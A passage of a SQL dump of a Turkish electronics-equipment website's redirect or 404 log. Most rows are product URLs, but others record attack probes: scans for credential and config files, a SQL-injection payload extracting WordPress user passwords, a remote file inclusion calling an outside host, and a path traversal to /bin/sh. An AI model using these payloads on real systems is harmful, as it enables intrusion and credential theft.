00:00:00',301),(27671,'http://www.3s-technologies.com.tr/tr/akrilik-iåÿleme-acrylic-processing/akrilik-oyma-acrylic-engraving',NULL,'','',8,0,'2021-08-14 10:18:16','0000-00-00 00:00:00',301),(27672,'https://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,mf_name?language=tr-tr',NULL,'','',3,0,'2021-08-14 12:26:23','0000-00-00 00:00:00',301),(27673,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc/results,1-5?language=tr-tr&filter_product=',NULL,'','',4,0,'2021-08-14 13:03:53','0000-00-00 00:00:00',301),(27674,'https://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,product_sku/results,1-20?language=tr-tr',NULL,'','',2,0,'2021-08-14 15:44:24','0000-00-00 00:00:00',301),(27675,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,product_name/results,1-5?language=tr-tr&filter_product=',NULL,'','',2,0,'2021-08-14 17:48:43','0000-00-00 00:00:00',301),(27676,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name/results,1-5?language=tr-tr&filter_product=',NULL,'','',2,0,'2021-08-14 18:14:22','0000-00-00 00:00:00',301),(27677,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_sku?language=en-gb',NULL,'','',2,0,'2021-08-14 18:29:23','0000-00-00 00:00:00',301),(27678,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-10?language=tr-tr',NULL,'','',2,0,'2021-08-14 20:21:53','0000-00-00 00:00:00',301),(27679,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-5,000cph',NULL,'','',2,0,'2021-08-14 21:48:36','0000-00-00 00:00:00',301),(27680,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,ordering?language=en-gb',NULL,'','',2,0,'2021-08-15 05:27:49','0000-00-00 00:00:00',301),(27681,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name/results,1-50?language=en-gb',NULL,'','',2,0,'2021-08-15 06:25:07','0000-00-00 00:00:00',301),(27682,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2021-08-15 11:57:35','0000-00-00 00:00:00',301),(27683,'http://3s-technologies.com.tr/tr/app/etc/local.xml',NULL,'','',2,0,'2021-08-16 13:23:11','0000-00-00 00:00:00',301),(27684,'http://www.3s-technologies.com.tr/tr/phpinfo',NULL,'','',6,0,'2021-08-16 14:54:07','0000-00-00 00:00:00',301),(27685,'http://www.3s-technologies.com.tr/tr/phpinfo.php',NULL,'','',4,0,'2021-08-16 14:54:08','0000-00-00 00:00:00',301),(27686,'http://www.3s-technologies.com.tr/tr/info.php',NULL,'','',25,0,'2021-08-16 14:54:09','0000-00-00 00:00:00',301),(27687,'http://mail.3s-technologies.com.tr/tr/phpinfo',NULL,'','',1,0,'2021-08-16 19:22:59','0000-00-00 00:00:00',301),(27688,'http://mail.3s-technologies.com.tr/tr/phpinfo.php',NULL,'','',4,0,'2021-08-16 19:23:00','0000-00-00 00:00:00',301),(27689,'http://mail.3s-technologies.com.tr/tr/info.php',NULL,'','',88,0,'2021-08-16 19:23:01','0000-00-00 00:00:00',301),(27690,'http://www.3s-technologies.com.tr/en/akrilik-iåÿleme-acrylic-processing/akrilik-oyma-acrylic-engraving',NULL,'','',6,0,'2021-08-17 19:18:59','0000-00-00 00:00:00',301),(27691,'http://3s-technologies.com.tr/en/humans.txt',NULL,'http://3s-technologies.com.tr/humans.txt','',131,0,'2021-08-17 21:35:29','0000-00-00 00:00:00',301),(27692,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,category_name/results,1-5?language=tr-tr&filter_product=',NULL,'','',2,0,'2021-08-18 02:00:46','0000-00-00 00:00:00',301),(27693,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,category_name/results,1-5?language=tr-tr',NULL,'','',2,0,'2021-08-18 14:45:44','0000-00-00 00:00:00',301),(27694,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/results,1-10?language=tr-tr',NULL,'','',2,0,'2021-08-18 15:00:44','0000-00-00 00:00:00',301),(27695,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,product_name/results,1-50?language=tr-tr&filter_product=',NULL,'','',2,0,'2021-08-18 16:15:44','0000-00-00 00:00:00',301),(27696,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',1,0,'2021-08-19 03:34:00','0000-00-00 00:00:00',301),(27697,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,category_name/results,1-50?language=tr-tr&filter_product=',NULL,'','',1,0,'2021-08-19 05:00:46','0000-00-00 00:00:00',301),(27698,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/dirdesc?language=tr-tr',NULL,'','',6,0,'2021-08-19 05:15:50','0000-00-00 00:00:00',301),(27699,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name?language=tr-tr',NULL,'','',3,0,'2021-08-19 06:15:46','0000-00-00 00:00:00',301),(27700,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name?language=en-gb',NULL,'','',6,0,'2021-08-19 07:00:04','0000-00-00 00:00:00',301),(27701,'http://3s-technologies.com.tr/en/wood-processing-ahеџap-iеџleme',NULL,'http://3s-technologies.com.tr/en/wood-processing-ah%D0%95%D1%9Fap-i%D0%95%D1%9Fleme','',1,0,'2021-08-19 11:52:21','0000-00-00 00:00:00',301),(27702,'http://3s-technologies.com.tr/en/akrilik-iеџleme-acrylic-processing',NULL,'http://3s-technologies.com.tr/en/akrilik-i%D0%95%D1%9Fleme-acrylic-processing','',1,0,'2021-08-19 11:52:21','0000-00-00 00:00:00',301),(27703,'http://3s-technologies.com.tr/en/aluminyum-iеџleme-aluminum-processing',NULL,'http://3s-technologies.com.tr/en/aluminyum-i%D0%95%D1%9Fleme-aluminum-processing','',1,0,'2021-08-19 11:52:22','0000-00-00 00:00:00',301),(27704,'http://3s-technologies.com.tr/en/ahеџap-iеџleme-wood-processing-120cm',NULL,'http://3s-technologies.com.tr/en/ah%D0%95%D1%9Fap-i%D0%95%D1%9Fleme-wood-processing-120cm','',1,0,'2021-08-19 11:52:22','0000-00-00 00:00:00',301),(27705,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,product_sku/results,1-50?language=tr-tr&filter_product=',NULL,'','',1,0,'2021-08-19 16:35:14','0000-00-00 00:00:00',301),(27706,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,mf_name/results,1-50?language=tr-tr&filter_product=',NULL,'','',1,0,'2021-08-19 21:53:13','0000-00-00 00:00:00',301),(27707,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/?itemid=429',NULL,'','',2,0,'2021-08-20 04:53:56','0000-00-00 00:00:00',301),(27708,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/?itemid=243',NULL,'','',2,0,'2021-08-20 04:58:56','0000-00-00 00:00:00',301),(27709,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2021-08-20 05:22:05','0000-00-00 00:00:00',301),(27710,'http://3s-technologies.com.tr/tr/bc',NULL,'http://3s-technologies.com.tr/bc','',677,0,'2021-08-20 12:05:55','0000-00-00 00:00:00',301),(27711,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,category_name/results,1-10?language=tr-tr',NULL,'','',1,0,'2021-08-20 15:41:07','0000-00-00 00:00:00',301),(27712,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,product_name/results,1-10?language=tr-tr&filter_product=',NULL,'','',1,0,'2021-08-20 16:26:06','0000-00-00 00:00:00',301),(27713,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/results,1-100?language=en-gb&filter_product=',NULL,'','',2,0,'2021-08-20 18:15:53','0000-00-00 00:00:00',301),(27714,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2021-08-21 12:31:12','0000-00-00 00:00:00',301),(27715,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/results,1-10?language=tr-tr',NULL,'','',1,0,'2021-08-21 13:01:05','0000-00-00 00:00:00',301),(27716,'https://3s-technologies.com.tr/tr/?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',5,0,'2021-08-21 13:05:14','0000-00-00 00:00:00',301),(27717,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-10?language=tr-tr',NULL,'','',1,0,'2021-08-21 13:16:05','0000-00-00 00:00:00',301),(27718,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,product_name/results,1-10?language=tr-tr&filter_product=',NULL,'','',1,0,'2021-08-21 14:33:08','0000-00-00 00:00:00',301),(27719,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,product_name/dirdesc/results,1-50?language=tr-tr&filter_product=',NULL,'','',1,0,'2021-08-21 16:03:46','0000-00-00 00:00:00',301),(27720,'https://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,category_name/dirdesc',NULL,'','',1,0,'2021-08-21 17:04:09','0000-00-00 00:00:00',301),(27721,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın?language=en-gb',NULL,'','',2,0,'2021-08-22 14:19:41','0000-00-00 00:00:00',301),(27722,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/dirdesc/results,1-10?language=tr-tr',NULL,'','',2,0,'2021-08-22 15:34:50','0000-00-00 00:00:00',301),(27723,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name?language=en-gb',NULL,'','',2,0,'2021-08-22 17:16:03','0000-00-00 00:00:00',301),(27724,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/le-40v-detail',NULL,'','',8,0,'2021-08-23 02:19:58','0000-00-00 00:00:00',301),(27725,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,category_name?language=en-gb',NULL,'','',2,0,'2021-08-23 02:31:57','0000-00-00 00:00:00',301),(27726,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-detail',NULL,'','',2,0,'2021-08-23 05:33:47','0000-00-00 00:00:00',301),(27727,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/dirdesc/results,1-10?language=tr-tr',NULL,'','',1,0,'2021-08-23 08:58:05','0000-00-00 00:00:00',301),(27728,'http://www.3s-technologies.com.tr/tr/joomla/images/pdf/ape_catalog.pdf',NULL,'','',9,0,'2021-08-24 04:04:31','0000-00-00 00:00:00',301),(27729,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc/results,1-50?language=tr-tr&filter_product=',NULL,'','',1,0,'2021-08-24 04:17:21','0000-00-00 00:00:00',301),(27730,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lazer-markalama/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-08-24 17:41:53','0000-00-00 00:00:00',301),(27731,'http://3s-technologies.com.tr/en/_profiler/phpinfo',NULL,'','',12,0,'2021-08-26 09:10:31','0000-00-00 00:00:00',301),(27732,'http://3s-technologies.com.tr/en/phpinfo.php',NULL,'','',31,0,'2021-08-26 09:10:31','0000-00-00 00:00:00',301),(27733,'http://3s-technologies.com.tr/en/phpinfo',NULL,'','',14,0,'2021-08-26 09:10:32','0000-00-00 00:00:00',301),(27734,'http://3s-technologies.com.tr/en/aws.yml',NULL,'','',11,0,'2021-08-26 09:10:32','0000-00-00 00:00:00',301),(27735,'http://3s-technologies.com.tr/en/.env.bak',NULL,'','',13,0,'2021-08-26 09:10:33','0000-00-00 00:00:00',301),(27736,'http://3s-technologies.com.tr/en/info.php',NULL,'','',199,0,'2021-08-26 09:10:34','0000-00-00 00:00:00',301),(27737,'http://3s-technologies.com.tr/en/.aws/credentials',NULL,'','',14,0,'2021-08-26 09:10:34','0000-00-00 00:00:00',301),(27738,'http://3s-technologies.com.tr/en/config/aws.yml',NULL,'','',11,0,'2021-08-26 09:10:36','0000-00-00 00:00:00',301),(27739,'http://3s-technologies.com.tr/en/config.js',NULL,'','',13,0,'2021-08-26 09:10:38','0000-00-00 00:00:00',301),(27740,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,product_name/results,1-10?language=tr-tr&filter_product=',NULL,'','',1,0,'2021-08-26 22:25:14','0000-00-00 00:00:00',301),(27741,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-w2s-detail/askquestion?tmpl=component',NULL,'','',3,0,'2021-08-26 22:42:20','0000-00-00 00:00:00',301),(27742,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/panasonic',NULL,'','',1,0,'2021-08-26 22:43:57','0000-00-00 00:00:00',301),(27743,'http://3s-technologies.com.tr/tr/administrator/templates/bluestork/index.php',NULL,'','',1,0,'2021-08-27 09:43:38','0000-00-00 00:00:00',301),(27744,'http://3s-technologies.com.tr/tr/administrator/templates/bluestork/error.php',NULL,'','',1,0,'2021-08-27 09:43:43','0000-00-00 00:00:00',301),(27745,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/index.php',NULL,'','',1,0,'2021-08-27 09:43:50','0000-00-00 00:00:00',301),(27746,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/error.php',NULL,'','',1,0,'2021-08-27 09:43:55','0000-00-00 00:00:00',301),(27747,'http://3s-technologies.com.tr/tr/administrator/templates/isis/index.php',NULL,'','',1,0,'2021-08-27 09:43:59','0000-00-00 00:00:00',301),(27748,'http://3s-technologies.com.tr/tr/administrator/templates/isis/error.php',NULL,'','',1,0,'2021-08-27 09:44:06','0000-00-00 00:00:00',301),(27749,'http://3s-technologies.com.tr/tr/templates/beez5/index.php',NULL,'','',3,0,'2021-08-27 09:44:27','0000-00-00 00:00:00',301),(27750,'http://3s-technologies.com.tr/tr/templates/beez5/error.php',NULL,'','',3,0,'2021-08-27 09:44:33','0000-00-00 00:00:00',301),(27751,'http://3s-technologies.com.tr/tr/templates/beez3/index.php',NULL,'','',2,0,'2021-08-27 09:44:40','0000-00-00 00:00:00',301),(27752,'http://3s-technologies.com.tr/tr/templates/beez3/error.php',NULL,'','',2,0,'2021-08-27 09:44:44','0000-00-00 00:00:00',301),(27753,'http://3s-technologies.com.tr/tr/templates/beez_20/index.php',NULL,'','',1,0,'2021-08-27 09:45:01','0000-00-00 00:00:00',301),(27754,'http://3s-technologies.com.tr/tr/templates/beez_20/error.php',NULL,'','',1,0,'2021-08-27 09:45:04','0000-00-00 00:00:00',301),(27755,'http://3s-technologies.com.tr/tr/templates/protostar/index.php',NULL,'','',2,0,'2021-08-27 09:45:08','0000-00-00 00:00:00',301),(27756,'http://3s-technologies.com.tr/tr/templates/protostar/error.php',NULL,'','',2,0,'2021-08-27 09:45:13','0000-00-00 00:00:00',301),(27757,'http://3s-technologies.com.tr/tr/templates/atomic/index.php',NULL,'','',2,0,'2021-08-27 09:45:16','0000-00-00 00:00:00',301),(27758,'http://3s-technologies.com.tr/tr/templates/atomic/error.php',NULL,'','',2,0,'2021-08-27 09:45:20','0000-00-00 00:00:00',301),(27759,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc',NULL,'','',1,0,'2021-08-28 03:43:36','0000-00-00 00:00:00',301),(27760,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/le-40v-detail/askquestion?tmpl=component',NULL,'','',4,0,'2021-08-29 02:50:29','0000-00-00 00:00:00',301),(27761,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-10?language=tr-tr',NULL,'','',2,0,'2021-08-29 22:38:45','0000-00-00 00:00:00',301),(27762,'https://www.3s-technologies.com.tr/tr/akrilik-iåÿleme-acrylic-processing/akrilik-oyma-acrylic-engraving',NULL,'','',9,0,'2021-08-30 05:23:47','0000-00-00 00:00:00',301),(27763,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/cs40-detail/askquestion?tmpl=component',NULL,'','',2,0,'2021-08-30 06:25:54','0000-00-00 00:00:00',301),(27764,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lazer-markalama/lps-c-detail',NULL,'','',2,0,'2021-08-30 07:02:37','0000-00-00 00:00:00',301),(27765,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/rg131-detail/askquestion?tmpl=component',NULL,'','',1,0,'2021-08-31 16:01:32','0000-00-00 00:00:00',301),(27766,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-09-01 02:55:45','0000-00-00 00:00:00',301),(27767,'https://www.3s-technologies.com.tr/tr/images/ddm/reflow ovens/spartan_8s.gif',NULL,'','',4,0,'2021-09-01 03:26:45','0000-00-00 00:00:00',301),(27768,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/dirdesc?language=tr-tr&keyword=',NULL,'','',2,0,'2021-09-02 04:21:16','0000-00-00 00:00:00',301),(27769,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/odd-shape-inserter',NULL,'','',2,0,'2021-09-02 05:23:51','0000-00-00 00:00:00',301),(27770,'http://www.3s-technologies.com.tr/en/akrilik-iåÿleme-acrylic-processing/akrilik-iåÿleme-acrylic-processing',NULL,'','',4,0,'2021-09-02 10:25:11','0000-00-00 00:00:00',301),(27771,'https://www.3s-technologies.com.tr/tr/aluminyum-iåÿleme-aluminum-processing/aluminyum-iåÿleme-aluminum-processing',NULL,'','',15,0,'2021-09-03 04:53:22','0000-00-00 00:00:00',301),(27772,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-w2-detail/askquestion?tmpl=component',NULL,'','',1,0,'2021-09-03 11:28:35','0000-00-00 00:00:00',301),(27773,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-d3a-detail/askquestion?tmpl=component',NULL,'','',2,0,'2021-09-03 13:00:12','0000-00-00 00:00:00',301),(27774,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lazer-markalama/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2021-09-03 19:39:30','0000-00-00 00:00:00',301),(27775,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,category_name?language=tr-tr&keyword=',NULL,'','',3,0,'2021-09-03 21:18:11','0000-00-00 00:00:00',301),(27776,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-09-04 00:11:40','0000-00-00 00:00:00',301),(27777,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/by,category_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-09-04 06:10:25','0000-00-00 00:00:00',301),(27778,'http://www.3s-technologies.com.tr/tr/web/wp-login.php',NULL,'','',1,0,'2021-09-04 10:07:20','0000-00-00 00:00:00',301),(27779,'https://3s-technologies.com.tr/tr/wp/wp-login.php',NULL,'','',1,0,'2021-09-04 10:18:48','0000-00-00 00:00:00',301),(27780,'https://3s-technologies.com.tr/tr/test/wp-login.php',NULL,'','',1,0,'2021-09-04 10:45:02','0000-00-00 00:00:00',301),(27781,'http://www.3s-technologies.com.tr/tr/home/wp-login.php',NULL,'','',1,0,'2021-09-04 11:09:57','0000-00-00 00:00:00',301),(27782,'https://3s-technologies.com.tr/tr/home/wp-login.php',NULL,'','',1,0,'2021-09-04 11:13:35','0000-00-00 00:00:00',301),(27783,'https://3s-technologies.com.tr/tr/wordpress/wp-login.php',NULL,'','',1,0,'2021-09-04 13:45:36','0000-00-00 00:00:00',301),(27784,'http://www.3s-technologies.com.tr/tr/news/wp-login.php',NULL,'','',1,0,'2021-09-04 14:23:22','0000-00-00 00:00:00',301),(27785,'http://www.3s-technologies.com.tr/tr/new/wp-login.php',NULL,'','',1,0,'2021-09-04 16:07:37','0000-00-00 00:00:00',301),(27786,'https://3s-technologies.com.tr/tr/site/wp-login.php',NULL,'','',1,0,'2021-09-04 17:05:12','0000-00-00 00:00:00',301),(27787,'http://www.3s-technologies.com.tr/tr/cms/wp-login.php',NULL,'','',1,0,'2021-09-04 18:31:41','0000-00-00 00:00:00',301),(27788,'https://3s-technologies.com.tr/tr/cms/wp-login.php',NULL,'','',1,0,'2021-09-04 19:12:14','0000-00-00 00:00:00',301),(27789,'https://3s-technologies.com.tr/tr/web/wp-login.php',NULL,'','',1,0,'2021-09-04 19:29:12','0000-00-00 00:00:00',301),(27790,'https://3s-technologies.com.tr/tr/new/wp-login.php',NULL,'','',1,0,'2021-09-04 19:29:22','0000-00-00 00:00:00',301),(27791,'https://3s-technologies.com.tr/tr/news/wp-login.php',NULL,'','',1,0,'2021-09-04 23:01:27','0000-00-00 00:00:00',301),(27792,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2021-09-07 01:39:58','0000-00-00 00:00:00',301),(27793,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/by,product_sku?language=tr-tr&keyword=',NULL,'','',1,0,'2021-09-07 11:35:25','0000-00-00 00:00:00',301),(27794,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/rl132-detail/askquestion?tmpl=component',NULL,'','',1,0,'2021-09-07 15:39:56','0000-00-00 00:00:00',301),(27795,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-09-07 21:54:19','0000-00-00 00:00:00',301),(27796,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lazer-markalama/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-09-07 22:21:07','0000-00-00 00:00:00',301),(27797,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lazer-markalama/by,category_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-09-08 09:46:04','0000-00-00 00:00:00',301),(27798,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/rg131-detail?tmpl=component&print=1',NULL,'','',1,0,'2021-09-08 23:06:43','0000-00-00 00:00:00',301),(27799,'http://www.3s-technologies.com.tr/en/aluminyum-iåÿleme-aluminum-processing/aluminyum-iåÿleme-aluminum-processing',NULL,'','',7,0,'2021-09-09 06:58:22','0000-00-00 00:00:00',301),(27800,'http://3s-technologies.com.tr/tr/ãƒâ¼rãƒâ¼nler/smd-ultra-hã„â±z/npm-w2s-detail',NULL,'','',44,0,'2021-09-09 07:45:40','0000-00-00 00:00:00',301),(27801,'https://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/avb-detail',NULL,'','',2,0,'2021-09-10 23:51:45','0000-00-00 00:00:00',301),(27802,'https://3s-technologies.com.tr/tr/wp-includes/simplepie/theme-options.php',NULL,'','',1,0,'2021-09-12 01:43:18','0000-00-00 00:00:00',301),(27803,'http://3s-technologies.com.tr/tr/wp-includes/js/js.php',NULL,'','',1,0,'2021-09-12 07:40:52','0000-00-00 00:00:00',301),(27804,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın',NULL,'','',1,0,'2021-09-13 04:37:06','0000-00-00 00:00:00',301),(27805,'https://3s-technologies.com.tr/tr/wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%2522%2529%2520union%2520all%2520select%25201%252cconcat%25280x6861636b657231%252cuser_login%252c0x3a%252cuser_pass%252c0x6861636b657232%2529%2520from%2520wp_users%253b%2500',NULL,'','',5,0,'2021-09-13 20:28:39','0000-00-00 00:00:00',301),(27806,'https://3s-technologies.com.tr/tr/desktopmodules/dnngo_gomenu/dnn_skin.aspx',NULL,'','',1,0,'2021-09-14 08:26:38','0000-00-00 00:00:00',301),(27807,'http://3s-technologies.com.tr/tr/feed',NULL,'','',5,0,'2021-09-14 09:44:23','0000-00-00 00:00:00',301),(27808,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name?language=en-gb',NULL,'','',2,0,'2021-09-15 14:27:26','0000-00-00 00:00:00',301),(27809,'http://www.3s-technologies.com.tr/tr/nmgzrtiezp',NULL,'','',1,0,'2021-09-17 15:20:05','0000-00-00 00:00:00',301),(27810,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,category_name/results,1-50?language=tr-tr',NULL,'','',1,0,'2021-09-19 05:17:50','0000-00-00 00:00:00',301),(27811,'http://3s-technologies.com.tr/en/lock360.php?daksldlkdsadas=1',NULL,'','',4,0,'2021-09-23 18:44:31','0000-00-00 00:00:00',301),(27812,'http://3s-technologies.com.tr/tr/admin/logon.asp',NULL,'','',1,0,'2021-09-29 02:04:06','0000-00-00 00:00:00',301),(27813,'http://3s-technologies.com.tr/en/xindex.php?idb=https://gutsevich.ru/upload/iblock/04f/32/accesson.txt',NULL,'','',1,0,'2021-09-29 21:40:37','0000-00-00 00:00:00',301),(27814,'https://3s-technologies.com.tr/en//feed/',NULL,'','',23,0,'2021-09-29 23:46:50','0000-00-00 00:00:00',301),(27815,'https://3s-technologies.com.tr/en//2021/wp-includes/wlwmanifest.xml',NULL,'','',22,0,'2021-09-29 23:46:54','0000-00-00 00:00:00',301),(27816,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/dirdesc/results,1-10?language=en-gb',NULL,'','',1,0,'2021-09-30 00:47:30','0000-00-00 00:00:00',301),(27817,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name/results,1-50?language=en-gb',NULL,'','',1,0,'2021-09-30 01:30:40','0000-00-00 00:00:00',301),(27818,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name?language=en-gb',NULL,'','',1,0,'2021-09-30 08:56:50','0000-00-00 00:00:00',301),(27819,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_sku/results,1-5?language=en-gb&filter_product=',NULL,'','',1,0,'2021-10-01 09:09:25','0000-00-00 00:00:00',301),(27820,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/results,1-40?language=en-gb&filter_product=',NULL,'','',1,0,'2021-10-01 13:25:53','0000-00-00 00:00:00',301),(27821,'http://3s-technologies.com.tr/admin/logon.asp',NULL,'','',1,0,'2021-10-01 23:27:07','0000-00-00 00:00:00',301),(27822,'http://3s-technologies.com.tr/tr/wp-includes/js/jquery/jquery-migrate.min.js',NULL,'','',4,0,'2021-10-02 09:22:54','0000-00-00 00:00:00',301),(27823,'http://3s-technologies.com.tr/tr/wp-includes/id3/license.txt',NULL,'','',4,0,'2021-10-02 09:22:55','0000-00-00 00:00:00',301),(27824,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/results,1-10?language=en-gb&filter_product=',NULL,'','',1,0,'2021-10-02 17:09:10','0000-00-00 00:00:00',301),(27825,'http://3s-technologies.com.tr/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'','',1,0,'2021-10-03 06:34:28','0000-00-00 00:00:00',301),(27826,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/temizleme-makineleri/by,ordering/results,1-10?language=tr-tr',NULL,'','',1,0,'2021-10-04 07:30:21','0000-00-00 00:00:00',301),(27827,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_name?language=en-gb',NULL,'','',1,0,'2021-10-06 04:55:53','0000-00-00 00:00:00',301),(27828,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,mf_name/dirdesc/results,1-50?language=tr-tr&filter_product=',NULL,'','',1,0,'2021-10-06 14:23:07','0000-00-00 00:00:00',301),(27829,'https://3s-technologies.com.tr/en/wp-admin',NULL,'','',234,0,'2021-10-08 19:47:08','0000-00-00 00:00:00',301),(27830,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,product_name/dirdesc/results,1-5?language=tr-tr&filter_product=',NULL,'','',1,0,'2021-10-10 13:10:36','0000-00-00 00:00:00',301),(27831,'http://3s-technologies.com.tr/tr/p=1',NULL,'http://3s-technologies.com.tr/tr/p=1','',2,0,'2021-10-10 14:55:00','0000-00-00 00:00:00',301),(27832,'http://3s-technologies.com.tr/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh',NULL,'','',1,0,'2021-10-10 17:03:45','0000-00-00 